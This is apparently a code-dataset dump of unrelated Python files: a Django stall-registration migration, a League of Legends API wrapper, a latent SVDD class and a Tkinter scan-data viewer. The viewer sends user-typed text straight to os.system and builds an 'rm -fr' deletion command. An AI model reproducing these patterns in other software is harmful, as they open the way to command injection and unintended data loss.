('introduction', models.TextField(default='', help_text='简介')),
('cover_image', models.ImageField(help_text='封面图片', max_length=1024, null=True, upload_to='items/%Y/%m/%d')),
('forto', models.CharField(default='', help_text='面向人群', max_length=20)),
('is_restricted', models.CharField(default='', help_text='限制级是否', max_length=20)),
('circle', models.CharField(default='', help_text='出品社团', max_length=40)),
('is_started_with', models.BooleanField(default=False, help_text='是否首发')),
('item_order', models.IntegerField(default=0, help_text='商品排序')),
],
options={
'ordering': ['seller'],
},
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(max_length=255, unique=True)),
('value', models.TextField(default='')),
],
),
migrations.CreateModel(
name='Seller',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('email', models.EmailField(max_length=30, verbose_name='email address')),
('is_active', models.BooleanField(default=False, help_text='是否激活')),
('signup_datetime', models.DateTimeField(auto_now=True)),
('signup_address', models.GenericIPAddressField()),
('is_stall', models.BooleanField(help_text='是否摊位')),
('circle_name', models.CharField(help_text='社团名', max_length=40)),
('circle_description', models.TextField(help_text='社团介绍')),
('circle_image', models.ImageField(help_text='社团图标', upload_to='circle/%Y/%m/%d')),
('seller_id', models.CharField(default='', help_text='摊位号', max_length=10)),
('proposer_name', models.CharField(help_text='申请人姓名', max_length=20)),
('proposer_sex', models.CharField(help_text='性别', max_length=20)),
('proposer_qq', models.CharField(help_text='QQ', max_length=11)),
('proposer_phone', models.CharField(help_text='电话', max_length=20)),
('proposer_id', models.CharField(help_text='身份证号', max_length=18)),
('booth', models.FloatField(default=1, help_text='申请摊位数')),
('number_of_people', models.SmallIntegerField(default=1, help_text='申请人数')),
('remarks', models.TextField(default='', help_text='备注')),
('status', models.IntegerField(help_text='状态')),
('notice', models.TextField(default='', help_text='通知')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='ValidateCode',
fields=[
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('code', models.CharField(max_length=20, primary_key=True, serialize=False)),
('validated', models.BooleanField(default=False)),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Seller')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='ItemPicture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pmo', models.CharField(choices=[('unknown', 'unknown'), ('pmo2015', 'pmo2015'), ('pmo2016', 'pmo2016'), ('pmo2017', 'pmo2017'), ('pmo2018', 'pmo2018'), ('pmo2019', 'pmo2019')], default='unknown', help_text='漫展', max_length=10)),
('picture', models.ImageField(help_text='图片', max_length=1024, upload_to='items/%Y/%m/%d')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Item')),
],
),
migrations.AddField(
model_name='item',
name='seller',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='stall.Seller'),
),
]
|
gpl-2.0
| -6,446,297,086,749,532,000
| 59.343137
| 246
| 0.560845
| false
| 3.61421
| false
| false
| false
|
meraki-analytics/cassiopeia
|
cassiopeia/cassiopeia.py
|
1
|
6069
|
from typing import List, Set, Dict, Union, TextIO
import arrow
import datetime
from .data import Region, Queue, Season, Tier, Division, Position
from .core import Champion, Summoner, ChampionMastery, Rune, Item, Match, Map, SummonerSpell, Realms, ProfileIcon, LanguageStrings, CurrentMatch, ShardStatus, Versions, MatchHistory, Champions, ChampionMasteries, Runes, Items, SummonerSpells, Maps, FeaturedMatches, Locales, ProfileIcons, ChallengerLeague, GrandmasterLeague, MasterLeague, League, LeagueSummonerEntries, LeagueEntries, Patch, VerificationString, ChampionRotation
from .datastores import common as _common_datastore
from ._configuration import Settings, load_config, get_default_config
from . import configuration
# Settings endpoints
def apply_settings(config: Union[str, TextIO, Dict, Settings]):
if not isinstance(config, (Dict, Settings)):
config = load_config(config)
if not isinstance(config, Settings):
settings = Settings(config)
else:
settings = config
# Load any plugins after everything else has finished importing
import importlib
for plugin in settings.plugins:
imported_plugin = importlib.import_module("cassiopeia.plugins.{plugin}.monkeypatch".format(plugin=plugin))
print_calls(settings._Settings__default_print_calls, settings._Settings__default_print_riot_api_key)
# Overwrite the old settings
configuration._settings = settings
# Initialize the pipeline immediately
_ = configuration.settings.pipeline
def set_riot_api_key(key: str):
configuration.settings.set_riot_api_key(key)
def set_default_region(region: Union[Region, str]):
configuration.settings.set_region(region)
def print_calls(calls: bool, api_key: bool = False):
_common_datastore._print_calls = calls
_common_datastore._print_api_key = api_key
# Data endpoints
def get_league_entries(summoner: Summoner) -> LeagueEntries:
return summoner.league_entries
def get_paginated_league_entries(queue: Queue, tier: Tier, division: Division, region: Union[Region, str] = None) -> LeagueEntries:
return LeagueEntries(region=region, queue=queue, tier=tier, division=division)
def get_master_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> MasterLeague:
return MasterLeague(queue=queue, region=region)
def get_grandmaster_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> GrandmasterLeague:
return GrandmasterLeague(queue=queue, region=region)
def get_challenger_league(queue: Union[Queue, int, str], region: Union[Region, str] = None) -> ChallengerLeague:
return ChallengerLeague(queue=queue, region=region)
def get_match_history(summoner: Summoner, begin_index: int = None, end_index: int = None, begin_time: arrow.Arrow = None, end_time: arrow.Arrow = None, queues: Set[Queue] = None, seasons: Set[Season] = None, champions: Set[Champion] = None):
return MatchHistory(summoner=summoner, begin_index=begin_index, end_index=end_index, begin_time=begin_time, end_time=end_time, queues=queues, seasons=seasons, champions=champions)
def get_match(id : int, region: Union[Region, str] = None) -> Match:
return Match(id=id, region=region)
def get_featured_matches(region: Union[Region, str] = None) -> FeaturedMatches:
return FeaturedMatches(region=region)
def get_current_match(summoner: Summoner, region: Union[Region, str] = None) -> CurrentMatch:
return CurrentMatch(summoner=summoner, region=region)
def get_champion_masteries(summoner: Summoner, region: Union[Region, str] = None) -> ChampionMasteries:
return ChampionMasteries(summoner=summoner, region=region)
def get_champion_mastery(summoner: Summoner, champion: Union[Champion, int, str], region: Union[Region, str] = None) -> ChampionMastery:
return ChampionMastery(champion=champion, summoner=summoner, region=region)
def get_summoner(*, id: str = None, account_id: str = None, name: str = None, region: Union[Region, str] = None) -> Summoner:
return Summoner(id=id, account_id=account_id, name=name, region=region)
def get_champion(key: Union[str, int], region: Union[Region, str] = None) -> Champion:
return get_champions(region=region)[key]
def get_champions(region: Union[Region, str] = None) -> Champions:
return Champions(region=region)
def get_runes(region: Union[Region, str] = None) -> Runes:
return Runes(region=region)
def get_summoner_spells(region: Union[Region, str] = None) -> SummonerSpells:
return SummonerSpells(region=region)
def get_items(region: Union[Region, str] = None) -> Items:
return Items(region=region)
def get_maps(region: Union[Region, str] = None) -> Maps:
return Maps(region=region)
def get_profile_icons(region: Union[Region, str] = None) -> ProfileIcons:
return ProfileIcons(region=region)
def get_realms(region: Union[Region, str] = None) -> Realms:
return Realms(region=region)
def get_status(region: Union[Region, str] = None) -> ShardStatus:
return ShardStatus(region=region)
def get_language_strings(region: Union[Region, str] = None) -> LanguageStrings:
return LanguageStrings(region=region)
def get_locales(region: Union[Region, str] = None) -> List[str]:
return Locales(region=region)
def get_versions(region: Union[Region, str] = None) -> List[str]:
return Versions(region=region)
def get_version(date: datetime.date = None, region: Union[Region, str] = None) -> Union[None, str]:
versions = get_versions(region)
if date is None:
return versions[0]
else:
patch = Patch.from_date(date, region=region)
for version in versions:
if patch.majorminor in version:
return version
return None
def get_verification_string(summoner: Summoner) -> VerificationString:
return VerificationString(summoner=summoner)
def get_champion_rotations(region: Union[Region, str] = None) -> ChampionRotation:
return ChampionRotation(region=region)
# Pipeline
def _get_pipeline():
return configuration.settings.pipeline
|
mit
| 2,522,235,741,749,909,500
| 35.341317
| 429
| 0.731257
| false
| 3.276998
| true
| false
| false
|
sk413025/tilitools
|
latentsvdd.py
|
1
|
3222
|
from cvxopt import matrix,spmatrix,sparse,uniform,normal,setseed
from cvxopt.blas import dot,dotu
from cvxopt.solvers import qp
from cvxopt.lapack import syev
import numpy as np
import math as math
from kernel import Kernel
from svdd import SVDD
from ocsvm import OCSVM
import pylab as pl
import matplotlib.pyplot as plt
class LatentSVDD:
""" Latent variable support vector data description.
Written by Nico Goernitz, TU Berlin, 2014
For more information see:
'Learning and Evaluation with non-i.i.d Label Noise'
Goernitz et al., AISTATS & JMLR W&CP, 2014
"""
PRECISION = 10**-3 # important: effects the threshold, support vectors and speed!
C = 1.0 # (scalar) the regularization constant > 0
sobj = [] # structured object contains various functions
# i.e. get_num_dims(), get_num_samples(), get_sample(i), argmin(sol,i)
sol = [] # (vector) solution vector (after training, of course)
def __init__(self, sobj, C=1.0):
self.C = C
self.sobj = sobj
def train_dc(self, max_iter=50):
""" Solve the LatentSVDD optimization problem with a
sequential convex programming/DC-programming
approach:
Iteratively, find the most likely configuration of
the latent variables and then, optimize for the
model parameter using fixed latent states.
"""
N = self.sobj.get_num_samples()
DIMS = self.sobj.get_num_dims()
# intermediate solutions
# latent variables
latent = [0]*N
sol = 10.0*normal(DIMS,1)
psi = matrix(0.0, (DIMS,N)) # (dim x exm)
old_psi = matrix(0.0, (DIMS,N)) # (dim x exm)
threshold = 0
obj = -1
iter = 0
# terminate if objective function value doesn't change much
while iter<max_iter and (iter<2 or sum(sum(abs(np.array(psi-old_psi))))>=0.001):
print('Starting iteration {0}.'.format(iter))
print(sum(sum(abs(np.array(psi-old_psi)))))
iter += 1
old_psi = matrix(psi)
# 1. linearize
# for the current solution compute the
# most likely latent variable configuration
for i in range(N):
# min_z ||sol - Psi(x,z)||^2 = ||sol||^2 + min_z -2<sol,Psi(x,z)> + ||Psi(x,z)||^2
# Hence => ||sol||^2 - max_z 2<sol,Psi(x,z)> - ||Psi(x,z)||^2
(foo, latent[i], psi[:,i]) = self.sobj.argmax(sol, i, opt_type='quadratic')
# 2. solve the intermediate convex optimization problem
kernel = Kernel.get_kernel(psi,psi)
svdd = SVDD(kernel, self.C)
svdd.train_dual()
threshold = svdd.get_threshold()
inds = svdd.get_support_dual()
alphas = svdd.get_support_dual_values()
sol = psi[:,inds]*alphas
self.sol = sol
self.latent = latent
return (sol, latent, threshold)
def apply(self, pred_sobj):
""" Application of the LatentSVDD:
anomaly_score = min_z ||c*-\Psi(x,z)||^2
latent_state = argmin_z ||c*-\Psi(x,z)||^2
"""
N = pred_sobj.get_num_samples()
norm2 = self.sol.trans()*self.sol
vals = matrix(0.0, (1,N))
lats = matrix(0.0, (1,N))
for i in range(N):
# min_z ||sol - Psi(x,z)||^2 = ||sol||^2 + min_z -2<sol,Psi(x,z)> + ||Psi(x,z)||^2
# Hence => ||sol||^2 - max_z 2<sol,Psi(x,z)> - ||Psi(x,z)||^2
(max_obj, lats[i], foo) = pred_sobj.argmax(self.sol, i, opt_type='quadratic')
vals[i] = norm2 - max_obj
return (vals, lats)
|
mit
| -4,128,180,928,146,153,500
| 29.396226
| 86
| 0.646182
| false
| 2.685
| false
| false
| false
|
sniemi/SamPy
|
sandbox/src1/pviewer/pviewer.py
|
1
|
31336
|
#!/usr/bin/env python
from tkFileDialog import *
from Tkinter import *
from tkSimpleDialog import Dialog
import tkMessageBox
from plotAscii import *
from imageUtil import *
from view2d import *
from mdaAscii import *
import Pmw
import os, string
import AppShell
global Scan
global SH # SHARED
class setupPrinter(Dialog):
"Dialog for setting up printer "
def body(self,master):
self.title("Set Printer Dialog")
Label(master, text='Enter Printer Name:').grid(row=1, sticky=W)
self.label = StringVar()
self.label = Entry(master, width = 26 )
self.label.grid(row=1,column=1)
self.label.insert(0,SH['printer'])
return self.label
def apply(self):
SH['printer'] = self.label.get()
writeSH(SH)
class commandSyntax(Dialog):
"Dialog for sending a system command or any executable client"
def body(self,master):
self.title("Command Dialog")
self.commandsyntax = Pmw.EntryField(master, labelpos='w',
label_text='Enter Command:', value='',
command=self.valuechanged)
self.commandsyntax.pack(fill='x')
self.commandsyntax.component('entry').focus_set()
def valuechanged(self):
os.system(self.commandsyntax.get()+ ' &')
def apply(self):
self.destroy()
class pickDIdialog(Dialog):
"Dialog for selecting a text line which contains DI names to be used in multiline plot. If blank comment line picked, sequence number is used."
def body(self,master):
file = Scan['txtfile']
data = readArray(file)
nc = len(data[0])
self.nc = nc
fo = open(file,'r')
lines = fo.read()
fo.close()
lines = string.split(lines,'\n')
self.title("Pick Line where DI Names Resides")
box = Pmw.ScrolledListBox(master,
items=(lines),
labelpos=NW,label_font=SH['font'],
label_text='Extract column legends from the text window\nSelect the text line which contains\nlegends to be extracted for multi-line plot',
selectioncommand=self.selectionCommand,
dblclickcommand=self.selectionCommand,
usehullsize=1,hull_width=700,hull_height=400)
box.pack()
self.box = box
def selectionCommand(self):
box = self.box
sels = box.getcurselection()
sels = string.split(sels[0])
no = len(sels)
dc = no - self.nc
if dc >= 0:
sels = sels[dc:no]
ix = SH['ix']
sel = sels[ix+1:no]
else:
sel = range(self.nc)
V = []
for i in range(85):
V.append('')
for i in range(len(sel)):
V[i] = sel[i]
fo = open('pvs','w')
fo.write(str(V))
fo.close()
Scan['nc'] = len(V)
namedialog = GetLegends(self)
def apply(self):
self.destroy()
class GetXYVdialog(Dialog):
"Dialog to set column or line # of X, Y, DATA array located in the opend ascii 2D image file (generated by scanSee/catcher/yviewer)"
def body(self,master):
try:
font=SH['font'] #'Verdana 10 bold'
self.title("Extract X,Y,DATA array from scanSee ASCII file")
self.ix = [IntVar(),IntVar(),IntVar(),IntVar()]
Label(master,text='X and Data column #:',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='X Vector Column #').grid(row=1,column=1,sticky=W)
Label(master,text='Data Start Column #').grid(row=2,column=1,sticky=W)
Label(master,text='Y Vector Defined in:',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Y Vector Line #').grid(row=4,column=1,sticky=W)
Label(master,text='Y Start Column #').grid(row=5,column=1,sticky=W)
Entry(master,width=4,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
self.ix[0].set(0)
self.ix[1].set(2)
self.ix[2].set(3)
self.ix[3].set(2)
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
Scan['rowcol'] = ix
file = Scan['txtfile']
if file != '':
data = readArray(file)
nc = len(data)
nr = len(data[0])
data = rowreverse(data)
x = data[ix[0]]
data = data[ix[1]:nr]
data = array(data)
fo = open(file,'r')
lines = fo.read()
fo.close
lines = string.split(lines,'\n')
if ix[2] >= 0:
py = lines[ix[2]]
py = string.split(py)
y = py[ix[3]:len(py)]
for i in range(len(y)):
y[i] = string.atof(y[i])
else:
y = range(len(data))
Scan['X'] = x
Scan['Y'] = y
file = Scan['txtfile']
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
class defineXYdialog(Dialog):
"Dialog for entering Xmin,Xmax,Ymin,Ymax ranges"
def body(self,master):
try:
file = Scan['txtfile']
data = readArray(file)
data = rowreverse(data)
data = array(data)
nc = data.shape[1]
nr = data.shape[0]
Scan['im'] = data
font=SH['font'] #'Verdana 10 bold'
self.title("Set X, Y Ranges for Image Plot")
self.ix = [StringVar(),StringVar(),StringVar(),StringVar()]
Label(master,text='Enter X Plot Range',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='Xmin').grid(row=1,column=1,sticky=W)
Label(master,text='Xmax').grid(row=2,column=1,sticky=W)
Label(master,text='Enter Y Plot Range',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Ymin').grid(row=4,column=1,sticky=W)
Label(master,text='Ymax').grid(row=5,column=1,sticky=W)
Entry(master,width=14,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=14,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
self.ix[0].set(1.)
self.ix[1].set(float(nc))
self.ix[2].set(1.)
self.ix[3].set(float(nr))
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
ix = [string.atof(ix[0]),string.atof(ix[1]),string.atof(ix[2]),
string.atof(ix[3])]
data = Scan['im']
nr = data.shape[0]
nc = data.shape[1]
x = []
dx = (ix[1]-ix[0])/(nc-1)
for i in range(nc):
x.append(ix[0]+dx*i)
y = []
dy = (ix[3]-ix[2])/(nr-1)
for i in range(nr):
y.append(ix[2]+dy*i)
if Scan['updown']:
plot2dUpdown(data,x,y,title=Scan['txtfile'])
else:
plot2d(data,x,y,title=Scan['txtfile'])
class GetXYdialog(Dialog):
"Dialog for define X,Y vector line and column #"
def body(self,master):
try:
font=SH['font'] #'Verdana 10 bold'
self.title("Get X, Y Vectors from ASCII file")
self.ix = [IntVar(),IntVar(),IntVar(),IntVar()]
Label(master,text='X Vector Defined in:',font=font).grid(row=0,column=0,sticky=W)
Label(master,text='Line #').grid(row=1,column=1,sticky=W)
Label(master,text='Start Column #').grid(row=2,column=1,sticky=W)
Label(master,text='Y Vector Defined in:',font=font).grid(row=3,column=0,sticky=W)
Label(master,text='Line #').grid(row=4,column=1,sticky=W)
Label(master,text='Start Column #').grid(row=5,column=1,sticky=W)
Entry(master,width=4,textvariable=self.ix[0]).grid(row=1,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[1]).grid(row=2,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[2]).grid(row=4,column=2,sticky=W)
Entry(master,width=4,textvariable=self.ix[3]).grid(row=5,column=2,sticky=W)
# cl = Scan['rowcol']
cl = [3,2,4,2]
self.ix[0].set(cl[0])
self.ix[1].set(cl[1])
self.ix[2].set(cl[2])
self.ix[3].set(cl[3])
except AttributeError:
return self.ix[0]
def get(self):
return [self.ix[0].get(),self.ix[1].get(),self.ix[2].get(),self.ix[3].get()]
def apply(self):
ix = self.get()
Scan['rowcol'] = ix
file = Scan['txtfile']
if file != '':
fo = open(file,'r')
lines = fo.read()
fo.close
lines = string.split(lines,'\n')
px = lines[ix[0]]
px = string.split(px)
x = px[ix[1]:len(px)]
for i in range(len(x)):
x[i] = string.atof(x[i])
py = lines[ix[2]]
py = string.split(py)
y = py[ix[3]:len(py)]
for i in range(len(y)):
y[i] = string.atof(y[i])
Scan['X'] = x
Scan['Y'] = y
file = Scan['txtfile']
data = readArray(file)
data = rowreverse(data)
data = array(data)
if Scan['updown']:
plot2dUpdown(data,x,y,title=file)
else:
plot2d(data,x,y,title=file)
class GetXdialog(Dialog):
"Dialog for defining X column # in text file"
def body(self,master):
font=SH['font'] #'Verdana 10 bold'
self.title("1D Multi-Line Plot")
self.ix = IntVar()
Label(master,text='Defined valid X column # from text file:',font=font).pack(anchor=NW)
Label(master,text=Scan['txtfile'],font=font).pack(anchor=NW)
Label(master,text='-1 - No X column defined ').pack(anchor=NW)
Label(master,text=' 0 - X defined at First column').pack(anchor=NW)
Label(master,text=' 1 - X defined at Second column').pack(anchor=NW)
Label(master,text='Enter X Column Index #:',font=font).pack(side=LEFT)
self.ix = Entry(master, width = 4)
self.ix.pack(side=LEFT)
v = self.get()
self.ix.insert(0,v)
return self.ix
def get(self):
# fo.close()
SH = readSH()
ix = SH['ix']
return ix
def apply(self):
ix = self.ix.get()
SH['ix'] = string.atoi(ix)
writeSH(SH)
os.system('plotAscii.py '+Scan['txtfile']+' '+str(ix) +' &')
class pick2Ddetector(Dialog):
"Dialog to pick any detector from the MDA 2D detector list and plot the selected 2D detector image"
def body(self,master):
self.title("Select 2D Detector")
box = Pmw.ScrolledListBox(master,
items=('1','2','3','4'),
labelpos=NW,label_text='Pick Detector',
selectioncommand=self.selectionCommand,
dblclickcommand=self.selectionCommand,
usehullsize=1,hull_width=200,hull_height=200)
box.pack()
self.box = box
def selectionCommand(self):
box = self.box
sels = box.getcurselection()
sels = string.split(sels[0])
sel = string.atoi(sels[0])
Scan['2d'] = sel
d = Scan['data']
pick2d(d,sel,updown=Scan['updown'])
def apply(self):
self.destroy()
class pviewer(AppShell.AppShell):
usecommandarea=1
balloonhelp=1
appversion = '1.0'
appname = 'pviewer'
copyright = 'Copyright ANL-APS-AOD-BCDA. All Rights Reserved'
contactname = 'Ben-chin K Cha'
contactphone = '(630) 252-8653'
contactemail = 'cha@aps.anl.gov'
frameWidth = 800
frameHeight = 500
def unimplemented(self):
pass
def messageMDA(self):
box = Pmw.Dialog(self.interior(),
defaultbutton='OK',title='Info')
w = Label(box.interior(),
text='You need to use File->Open MDA...\n to load in an MDA file first',
padx=10,pady=10).pack()
box.activate()
def messageAscii(self):
box = Pmw.Dialog(self.interior(),
defaultbutton='OK',title='Info')
w = Label(box.interior(),
text='You need to use File->Open Ascii...\n to load in an ASCII file first',
padx=10,pady=10).pack()
box.activate()
def savepvs(self):
file = 'pvs'
V = self.apply()
fd = open(file,'w')
fd.write(str(V))
fd.close()
def createButtons(self):
self.buttonAdd('Exit',
helpMessage='Exit pviewer',
statusMessage='Exit pviewer',
command=self.closeup)
def startup(self):
if os.path.isfile('pviewer.config'):
lines = readST('pviewer.config')
self.mdapath = lines[0]
self.txtpath = lines[1]
print 'self.mdapath=', self.mdapath
print 'self.txtpath=', self.txtpath
else:
self.mdapath = os.curdir
self.txtpath = os.curdir
def closeup(self):
fo = open('pviewer.config','w')
st = [ self.mdapath,self.txtpath]
# print str(st)
fo.write(str(st))
fo.close()
self.quit()
# def addmenuBar(self):
# self.menuBar.addmenu('Setup','Fields for plot legend')
def addMoremenuBar(self):
self.menuBar.addmenuitem('File', 'command', 'Quit this application',
label='Quit',
command=self.closeup)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'Setup Printer ...',
label='Printer...',
command=self.printerDialog)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'File Selection dialog for Ascii File ...',
label='Open Ascii ...',
command=self.openAscii)
self.menuBar.addmenuitem('File', 'command', '', label='--------------')
self.menuBar.addmenuitem('File', 'command',
'File Selection dialog for MDA File ...',
label='Open MDA ...',
command=self.openMDA)
self.menuBar.addmenuitem('Help', 'command',
'Online help about this application ...',
label='pviewer_help.txt ...',
command=self.openHelpText)
self.menuBar.addmenuitem('Setup','command',
'Pick and load Color Table for 2D image plot ',
label='Color Table...',
command=self.setCTdialog)
self.menuBar.addmenuitem('Setup','command',
'Modify legend field names used in multiline plot',
label='Name Legends...',
command=self.legenddialog)
self.toggleUpdownVar=IntVar()
self.toggleUpdownVar.set(1)
self.menuBar.addmenuitem('Setup','checkbutton',
'Toggle plot2d updown mode',
label='Image Upside Down',
variable=self.toggleUpdownVar,
command=self.updownImage)
self.menuBar.addmenu('MDAView','Various MDAView features')
self.menuBar.addmenuitem('MDAView','command',
'Access 1D Array and pass to multiline plotter...',
label='Multi-line 1D Plot...',
command=self.mda1DRptPlot)
self.menuBar.addmenuitem('MDAView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAView','command',
'Access panimage window',
label='PanImages...',
command=self.getpanimage)
self.menuBar.addmenuitem('MDAView','command',
'Display 2D image for the select detector',
label='Pick Di Image...',
command=self.get2Ddetector)
self.menuBar.addmenu('MDAReports','Various Report features')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA 1D/2D reports',
label='MDA 1D/2D Reports...',
command=self.mdaReport)
self.menuBar.addmenuitem('MDAReports','command',
'Generate sequential MDA 1D report from 2D array',
label='MDA 2D->1D Report...',
command=self.mda2D1DRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA report for current MDA directory',
label='Generate All MDA Report...',
command=self.mdaAllRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Generate MDA 2D report in IGOR format',
label='MDA to IGOR Report...',
command=self.mdaIGORRpt)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Show ASCII Report Files',
label='View ASCII Report...',
command=self.showAscii)
self.menuBar.addmenuitem('MDAReports', 'command', '',
label='--------------')
self.menuBar.addmenuitem('MDAReports','command',
'Clear All Files in ASCII directory',
label='Remove All Reports...',
command=self.removeAscii)
self.menuBar.addmenu('AsciiView','Various AsciiView features')
self.menuBar.addmenuitem('AsciiView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('AsciiView','command',
'Enter the zero based X column # in ASCII file',
label='Multi-line Plotter...',
command=self.XcolDialog)
self.menuBar.addmenuitem('AsciiView','command',
'Pick line of DI legend name from the ascii file',
label='Extract & Modify Legend...',
command=self.DIlinedialog)
self.menuBar.addmenuitem('AsciiView', 'command', '',
label='--------------')
self.menuBar.addmenuitem('AsciiView', 'command',
'Pass ascii text data to image plot ...',
label='TV Image ...',
command=self.imageAscii)
self.menuBar.addmenu('Ascii2Image','Plot2D Ascii Image features')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'No X,Y vector defined in ascii file',
label='Plot2d...',
command=self.plot2ddialog)
self.menuBar.addmenuitem('Ascii2Image', 'command',
'User set X,Y ranges dialog',
label='X,Y Range for image...',
command=self.XYrangeDialog)
self.menuBar.addmenuitem('Ascii2Image', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'Extract the X,Y line vectors from mdaAscii generated file',
label='X,Y Line vector from mdaAscii file...',
command=self.XYrowcolDialog)
self.menuBar.addmenuitem('Ascii2Image', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Ascii2Image', 'command',
'Extract X,Y,Data from scanSee/catcher/yviewer generated file',
label='X column, Y line, DATA column from ascii file...',
command=self.XYVDialog)
self.menuBar.addmenu('ScanTools','Various scan programs')
self.menuBar.addmenuitem('ScanTools','command',
'Run plot.py python program',
label='Python plot.py ...',
command=self.runPlot)
self.menuBar.addmenuitem('ScanTools', 'command', '',
label='--------------')
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm sscan (scanSee) program',
label='idlvm sscan ...',
command=self.runSscan)
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm catcher (catcher) program',
label='idlvm catcher ...',
command=self.runCatcher)
self.menuBar.addmenuitem('ScanTools','command',
'Run idlvm mca (MCA) program',
label='idlvm mca ...',
command=self.runMCA)
self.menuBar.addmenu('Tools','Various system tools')
self.menuBar.addmenuitem('Tools','command',
'Run start_epics program',
label='start_epics ...',
command=self.runMedm)
self.menuBar.addmenuitem('Tools', 'command', '',
label='--------------')
self.menuBar.addmenuitem('Tools', 'command',
'Enter any valid command syntax ...',
label='Command Dialog...',
command=self.commandDialog)
def runPlot(self):
os.system('plot.py & ')
def runSscan(self):
os.system('idlvm sscan & ')
def runCatcher(self):
os.system('idlvm catcher & ')
def runMCA(self):
os.system('idlvm mca & ')
def runMedm(self):
h = os.getenv('HOME')
os.system(h +'/start_epics & ')
def commandDialog(self):
cmd = commandSyntax(self.interior())
def printerDialog(self):
setupPrinter(self.interior())
def removeAscii(self):
from Dialog import *
# dir = os.getcwd() +os.sep+'ASCII'+os.sep+'*.txt'
dir = self.txtpath+os.sep+'*.txt'
dir = 'rm -fr '+dir
pa = {'title': 'Remove ASCII files',
'text': dir + '\n\n'
'All ascii text files will be removed\n'
'from the sub-directory ASCII.\n'
'Is it OK to remove all files ?\n ',
'bitmap': DIALOG_ICON,
'default': 1,
'strings': ('OK','Cancel')}
dialog = Dialog(self.interior(),pa)
ans = dialog.num
if ans == 0:
print dir
os.system(dir)
def showAscii(self):
fname = tkFileDialog.askopenfilename(initialdir=self.txtpath,initialfile="*txt*")
if fname == (): return
xdisplayfile(fname)
def mdaIGORRpt(self):
if Scan['open']:
d = self.MDA
if d[0]['rank'] < 2:
return
fname = self.mdafile
ofname = mdaAscii_IGOR(d)
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text=ofname,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
fo = open(ofname,'r')
st_text = fo.read()
fo.close()
st.settext(st_text)
st.pack(fill=BOTH, expand=1, padx=5, pady=5)
self.textWid = st
self.textfile = ofname
SH['ix'] = -1
writeSH(SH)
(self.txtpath,fn) = os.path.split(ofname)
else:
self.messageMDA()
def mdaAllRpt(self):
if self.textWid != None:
self.textWid.destroy()
self.textWid = None
st = Pmw.ScrolledText(self.interior(),borderframe=1,labelpos=N,
label_text='MDA file from: '+self.mdapath,usehullsize=1,
hull_width=800,hull_height=400,
text_padx=10,text_pady=10,
text_wrap='none')
st.pack()
st.settext('Reports saved in: '+os.getcwd()+os.sep+'ASCII')
self.textWid=st
mdaAscii_all(self.mdapath)
def mda2D1DRpt(self):
